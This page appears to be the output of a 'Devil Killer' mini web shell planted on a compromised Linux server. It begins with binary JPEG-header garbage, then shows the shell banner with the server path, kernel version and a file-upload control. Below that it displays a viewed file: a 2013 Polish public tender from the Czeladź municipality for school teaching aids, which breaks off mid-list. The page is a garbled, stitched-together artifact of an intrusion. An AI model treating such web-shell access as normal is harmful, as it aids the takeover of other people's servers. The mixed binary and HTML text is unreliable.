JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20130319/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20130319/109250-N-2013.html

<p class="kh_header"><b>Czeladź: Dostawa pomocy dydaktycznych w ramach projektu pt. Czeladzka Liga Naukowa współfinansowanego przez Unię Europejską ze środków Europejskiego Funduszu Społecznego w ramach Programu Operacyjnego Kapitał Ludzki</b><br>
<b>Numer ogłoszenia: 109250 - 2013; data zamieszczenia: 19.03.2013</b><br>
OGŁOSZENIE O ZAMÓWIENIU - dostawy<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Gmina Czeladź reprezentowana przez Burmistrza , ul. Katowicka 45, 41-250 Czeladź, woj. śląskie, tel. 032 7637923, faks 032 7633694.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.czeladz.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Dostawa pomocy dydaktycznych w ramach projektu pt. Czeladzka Liga Naukowa współfinansowanego przez Unię Europejską ze środków Europejskiego Funduszu Społecznego w ramach Programu Operacyjnego Kapitał Ludzki.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> dostawy.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Wspólny Słownik Zamówień, kod CPV: 
39.16.21.00-6 - Pomoce dydaktyczne; 
39.16.21.10-9 -? Sprzęt dydaktyczny; 
39.16.00.00-1 - Meble szkolne;
30.21.31.00-6 - Komputery przenośne;
30.23.00.00-0 - Sprzęt związany z komputerami;
48.19.00.00-6 - Pakiety oprogramowania edukacyjnego; 
30.19.00.00-7-  Różny sprzęt i artykuły biurowe. 

Przedmiotem zamówienia jest dostawa pomocy dydaktycznych do prowadzenia dodatkowych zajęć wyrównawczych oraz poszerzających i kształcących kompetencje matematyczno - przyrodnicze w ramach projektu Czeladzka Liga Naukowa. Zamówienie składa się z 7 części, w tym: 
1) część 1 - Pakiet pomocy dydaktycznych dla ucznia - matematyka, 2) część 2 - Pakiet pomocy dydaktycznych dla ucznia - przyroda 3) część 3 - Wyposażenie pracowni przyrodniczej, 4) część 4 - Wyposażenie pracowni matematycznej, 5) część piąta - Zestaw multimedialny, 6) część szósta - Programy komputerowe/ EDU Romy, 7) część siódma - Meble biurowe.
Realizacja dostaw zamówienia odbędzie się w terminie 21 dni od daty podpisania umowy.
Wykaz dostaw zawiera Opis przedmiotu zamówienia (Załącznik numer 6 do SIWZ).

Wymagania stawiane Wykonawcy przez Zamawiającego
1) Zamawiający wymaga, żeby dostarczone pomoce dydaktyczne, materiały biurowe                              i wyposażenie były nowe, kompletne, wykonane w ramach bezpiecznych technologii oraz żeby spełniały wymagania obowiązujących norm, zapakowane w opakowania umożliwiające jednoznaczną identyfikację zapakowanego produktu.
2) Zamawiający wymaga, żeby wszystkie elementy przedmiotu zamówienia, które tego wymagają były zaopatrzone w instrukcję w języku polskim.
3) Wszystkie urządzenia i sprzęt muszą posiadać certyfikaty i atesty dopuszczające do użytku w szkole określone w odrębnych przepisach.
4) Produkty, które tego wymagają muszą posiadać niezbędne certyfikaty bezpieczeństwa                   określone w odrębnych przepisach.
5) Zaleca się, aby dostarczony asortyment zapakowany był w tekturowych pudełkach                                      uniemożliwiających uszkodzenie produktów w czasie transportu.
6) Odpowiedzialność za uszkodzenia produktów w czasie transportu ponosi Wykonawca.
7) Wady towaru powstałe z winy Wykonawcy, których Zamawiający nie mógł stwierdzić przy              odbiorze, zostaną usunięte przez Wykonawcę poprzez wymianę towaru na nowy w terminie 7 dni od zgłoszenia przez Zamawiającego.
8) Wykonawca dostarczy materiały bezpośrednio do szkół, w dniach prac Szkoły Podstawowej Nr1; Szkoły Podstawowej Nr 2; Szkoły Podstawowej Nr 3 i Szkoły Podstawowej Nr 7 w Czeladzi od poniedziałku do piątku w godzinach od 7.00 do 15.00. Każda dostawa będzie uzgodniona szczegółowo pomiędzy Zamawiającym, a Wykonawcą.
9) Wykonawca we własnym zakresie zapewni rozładunek dostarczonych pomocy                          dydaktycznych.
Wszystkie nazwy własne i marki handlowe urządzeń i wyposażenia zawarte w SIWZ, zostały użyte w celu sprecyzowania oczekiwań jakościowych i technologicznych Zamawiającego. Zamawiający dopuszcza rozwiązania równoważne. Jako rozwiązanie równoważne należy rozumieć zastosowanie innego niż opisane nazwą urządzenia lub elementu wyposażenia z zachowaniem takich samych parametrów technicznych, jakościowych, użytkowych i funkcjonalnych. Równoważne produkty i urządzenia muszą być dopuszczone                 do obrotu i stosowania zgodnie z obowiązującym prawem.
Wykonawca udzieli na dostarczony przedmiot zamówienia gwarancji jakości i rękojmi na okres  12 miesięcy, z tym że dla kalkulatorów, mikroskopów, szaf metalowych i zestawów multimedialnych składających się z: tablicy interaktywnej i laptopa na okres 24 miesięcy.
Wynagrodzenie dla Wykonawcy będzie wypłacone przelewem na rachunek bankowy wskazany przez Wykonawcę w terminie 30 dni kalendarzowych od dnia otrzymania przez Zamawiającego prawidłowo wystawionej faktury VAT. Podstawą wystawienia faktury jest przyjęcie przez Zamawiającego przedmiotu umowy w ramach dostarczonej partii zamówienia oraz podpisanie przez Zamawiającego protokołu odbioru, o którym mowa w § 4 ust. 4 Umowy, bez zastrzeżeń Szczegółowy Opis przedmiotu zamówienia znajduje się w załączniku nr 6 do SIWZ..</p>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 39.16.21.00-6, 39.16.21.10-9, 39.16.00.00-1, 30.21.31.00-6, 30.23.00.00-0, 48.19.00.00-6, 30.19.00.00-7.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 7.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Okres w dniach: 21.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>


<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie wyznacza szczegółowego warunku w tym zakresie. Zamawiający spełnienie warunków oceni na podstawie oświadczenia o spełnianiu warunków w trybie art. 22 ust.1 Ustawy zgodnie z formułą: spełnia / nie spełnia</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie wyznacza szczegółowego warunku w tym zakresie. Zamawiający spełnienie warunków oceni na podstawie oświadczenia o spełnianiu warunków w trybie art. 22 ust.1 Ustawy zgodnie z formułą: spełnia / nie spełnia</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie wyznacza szczegółowego warunku w tym zakresie. Zamawiający spełnienie warunków oceni na podstawie oświadczenia o spełnianiu warunków w trybie art. 22 ust.1 Ustawy zgodnie z formułą: spełnia / nie spełnia</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie wyznacza szczegółowego warunku w tym zakresie. Zamawiający spełnienie warunków oceni na podstawie oświadczenia o spełnianiu warunków w trybie art. 22 ust.1 Ustawy zgodnie z formułą: spełnia / nie spełnia</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie wyznacza szczegółowego warunku w tym zakresie. Zamawiający spełnienie warunków oceni na podstawie oświadczenia o spełnianiu warunków w trybie art. 22 ust.1 Ustawy zgodnie z formułą: spełnia / nie spełnia</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>

<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">wykonawca powołujący się przy wykazywaniu spełniania warunków udziału w postępowaniu na zasoby innych podmiotów, które będą brały udział w realizacji części zamówienia, przedkłada także dokumenty dotyczące tego podmiotu w zakresie wymaganym dla wykonawcy, określonym w pkt III.4.2.</li>

</ul>

<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul><p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul><p><b>III.6) INNE DOKUMENTY</b></p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>1. Formularz ofertowy; wraz z formularzem cenowym (zał. 1a;1b;1c;1d;1e;1f;1g w zależności od tego, na które zadanie wykonawca składa ofertę).
2. Pisemne zobowiązanie podmiotów oddających Wykonawcy do dyspozycji niezbędne zasoby na okres korzystania z nich przy wykonywaniu zamówienia, jeżeli Wykonawca polega na wiedzy i doświadczeniu, potencjale technicznym, osobach zdolnych do wykonania zamówienia lub zdolnościach finansowych innych podmiotów;
3. Pełnomocnictwo, określające jego zakres w przypadku, gdy Wykonawcę reprezentuje pełnomocnik;
4. Pełnomocnictwo do reprezentowania w postępowaniu o udzielenie zamówienia publicznego albo reprezentowaniu w postępowaniu i zawarcia umowy w sprawie zamówienia publicznego Wykonawców występujących wspólnie w przypadku wspólnego ubiegania się o udzielenie zamówienia.
5. W przypadku wybrania oferty wykonawców wspólnie ubiegających się o udzielenie zamówienia, Zamawiający zażąda przed zawarciem umowy w sprawie zamówienia publicznego umowy regulującej współpracę tych wykonawców (art. 23 ust. 4 Ustawy).</p>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b></p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>Warunki tej zmiany dotyczyć mogą wyłącznie sytuacji:
- wystąpienia siły wyższej powodującej konieczność dokonania zmiany;
- konieczności wprowadzenia zmian będącej następstwem zmian wytycznych lub zaleceń                    instytucji, która przyznała środki na sfinansowanie zamówienia;
- jeżeli nastąpi zmiana powszechnie obowiązujących przepisów prawa w zakresie mającym wpływ na realizację przedmiotu zamówienia.
Ponadto dopuszcza się:
- zmianę terminów realizacji zamówienia z przyczyn niezależnych od Wykonawcy lub                      Zamawiającego, które to przyczyny każda ze Stron musi udokumentować, pod warunkiem, że takiej zgody udzieli instytucja dofinansowująca i że Zamawiający nie straci dofinansowania;
- zmianę podwykonawcy lub części wykonywanego przez niego zakresu przedmiotu umowy, bądź wprowadzenie nowego podwykonawcy, pod warunkiem, że nowy podwykonawca wykaże spełnianie warunków w zakresie nie mniejszym niż wskazany na etapie postępowania o udzielenie zamówienia publicznego dotychczasowy podwykonawca.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.czeladz.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Urząd Miasta Czeladź,41-250 Czeladź,ul.Katowicka 45;Biuro ds.Koordynacji Funduszy Unii Europejskiej,pok.202,tel.03276 37 989,fax(032)76 33 694, e-mail:mskiba@um.czeladz.pl;malgorzatao@um.czeladz.pl.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 28.03.2013 godzina 09:00, miejsce: Kancelaria Urzędu Miasta Czeladź, ul. Katowicka 45, pokój 118.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> Niniejsze zamówienie ma być współfinansowane ze środków Unii Europejskiej w ramach Europejskiego Funduszu Społecznego.Nazwa projektu/programu:Program Operacyjny Kapitał Ludzki, Priorytet IX Rozwój wykształcenia i kompetencji w regionach,Działania 9.1 Wyrównywanie szans edukacyjnych i zapewnienie wysokiej jakości usług edukacyjnych świadczonych w systemie oświaty, Poddziałania 9.1.2 Wyrównywanie szans edukacyjnych uczniów z grup o utrudnionym dostępie do edukacji oraz zmniejszanie różnic w jakości usług edukacyjnych, projektu Czeladzka Liga Naukowa..</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> Dostawa pomocy dydaktycznych w ramach projektu  Czeladzka Liga Naukowa. Pakiet pomocy dydaktycznych dla ucznia - matematyka dla szkół: SP nr 1 w Czeladzi, ul. Reymonta 80; SP nr 2 w Czeladzi ul. Szkolna 6; SP nr 3 w Czeladzi, ul. S. Staszica 47; SP nr 7 w Czeladzi ul. Spacerowa 2.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 39.16.21.00-6 - Pomoce dydaktyczne; 
39.16.21.10-9 -? Sprzęt dydaktyczny; 
30.19.00.00-7-  Różny sprzęt i artykuły biurowe. 
Przedmiotem zamówienia jest dostawa pomocy dydaktycznych do prowadzenia dodatkowych zajęć wyrównawczych oraz poszerzających i kształcących kompetencje matematyczno - przyrodnicze w ramach projektu Czeladzka Liga Naukowa w tym: część 1 - Pakiet pomocy dydaktycznych dla ucznia - matematyka.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 39.16.21.00-6, 39.16.21.10-9, 30.19.00.00-7.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w dniach: 21.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> Dostawa pomocy dydaktycznych w ramach projektu  Czeladzka Liga Naukowa. Pakiet pomocy dydaktycznych dla ucznia - przyroda dla szkół: SP nr 1 w Czeladzi, ul. Reymonta 80; SP nr 2 w Czeladzi, ul. Szkolna 6; SP nr 3 w Czeladzi, ul. S. Staszica 47; SP nr 7 w Czeladzi, ul. Spacerowa 2.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 39.16.21.00-6 - Pomoce dydaktyczne; 
30.19.00.00-7-  Różny sprzęt i artykuły biurowe. 
Przedmiotem zamówienia jest dostawa pomocy dydaktycznych do prowadzenia dodatkowych zajęć wyrównawczych oraz poszerzających i kształcących kompetencje matematyczno - przyrodnicze w ramach projektu Czeladzka Liga Naukowa w tym: część 2 - Pakiet pomocy dydaktycznych dla ucznia - przyroda.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 39.16.21.00-6, 30.19.00.00-7.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w dniach: 21.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 3 <b>NAZWA:</b> Dostawa pomocy dydaktycznych w ramach projektu  Czeladzka Liga Naukowa. Wyposażenie pracowni przyrodniczej dla szkół: SP nr 1 w Czeladzi, ul. Reymonta 80; SP nr 2 w Czeladzi, ul. Szkolna 6; SP nr 3 w Czeladzi ul. S. Staszica 47; SP nr 7 w Czeladzi, ul. Spacerowa 2.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 39.16.21.00-6 - Pomoce dydaktyczne; 
39.16.21.10-9 -? Sprzęt dydaktyczny; 
Przedmiotem zamówienia jest dostawa pomocy dydaktycznych do prowadzenia dodatkowych zajęć wyrównawczych oraz poszerzających i kształcących kompetencje matematyczno - przyrodnicze w ramach projektu Czeladzka Liga Naukowa w tym: część 3 - Wyposażenie pracowni przyrodniczej..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 39.16.21.00-6, 39.16.21.10-9.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w dniach: 21.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 4 <b>NAZWA:</b> Dostawa pomocy dydaktycznych w ramach projektu Czeladzka Liga Naukowa. Wyposażenie pracowni matematycznej dla szkół: SP nr 1 w Czeladzi, ul. Reymonta 80; SP nr 2 w Czeladzi,ul. Szkolna 6; SP nr 3 w Czeladzi, ul. ul. S. Staszica 47; SP nr 7w Czeladzi, ul. Spacerowa 2.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 39.16.21.00-6 - Pomoce dydaktyczne; 
39.16.21.10-9 -? Sprzęt dydaktyczny; 
Przedmiotem zamówienia jest dostawa pomocy dydaktycznych do prowadzenia dodatkowych zajęć wyrównawczych oraz poszerzających i kształcących kompetencje matematyczno - przyrodnicze w ramach projektu Czeladzka Liga Naukowa w tym: część 4 - Wyposażenie pracowni matematycznej..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 39.16.21.00-6, 39.16.21.10-9.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w dniach: 21.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 5 <b>NAZWA:</b> Dostawa pomocy dydaktycznych w ramach projektu  Czeladzka Liga Naukowa. Zestaw multimedialny dla szkół: SP nr 1 w Czeladzi, ul. Reymonta 80; SP nr 2 w Czeladzi, ul. Szkolna 6; SP nr 3 w Czeladzi, ul. S. Staszica 47; SP nr 7, Czeladź ul. Spacerowa 2.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 39.16.21.00-6 - Pomoce dydaktyczne; 
30.21.31.00-6 - Komputery przenośne;
30.23.00.00-0 - Sprzęt związany z komputerami;
Przedmiotem zamówienia jest dostawa pomocy dydaktycznych do prowadzenia dodatkowych zajęć wyrównawczych oraz poszerzających i kształcących kompetencje matematyczno - przyrodnicze w ramach projektu Czeladzka Liga Naukowa w tym: część piąta - Zestaw multimedialny..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 39.16.21.00-6, 30.21.31.00-6, 30.23.00.00-0.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w dniach: 21.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 6 <b>NAZWA:</b> Dostawa pomocy dydaktycznych w ramach projektu  Czeladzka Liga Naukowa. Programy komputerowe/EDU Romy dla szkół: SP nr 1 w Czeladzi, ul. Reymonta 80; SP nr 2 w Czeladzi, ul. Szkolna 6; SP nr 3 w Czeladzi ul. S. Staszica 47; SP nr 7w Czeladzi, ul. Spacerowa 2.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 39.16.21.00-6 - Pomoce dydaktyczne; 
48.19.00.00-6 - Pakiety oprogramowania edukacyjnego; 
Przedmiotem zamówienia jest dostawa pomocy dydaktycznych do prowadzenia dodatkowych zajęć wyrównawczych oraz poszerzających i kształcących kompetencje matematyczno - przyrodnicze w ramach projektu Czeladzka Liga Naukowa w tym: część szósta - Programy komputerowe/ EDU Romy.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 39.16.21.00-6, 48.19.00.00-6.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w dniach: 21.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 7 <b>NAZWA:</b> Dostawa pomocy dydaktycznych w ramach projektu  Czeladzka Liga Naukowa.  Meble biurowe dla szkół: SP nr 1 w Czeladzi, ul. Reymonta 80; SP nr 2 w Czeladzi, ul. Szkolna 6; SP nr 3 w Czeladzi ul. S. Staszica 47; SP nr 7 w Czeladzi, ul. Spacerowa 2.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 39.16.21.00-6 - Pomoce dydaktyczne; 
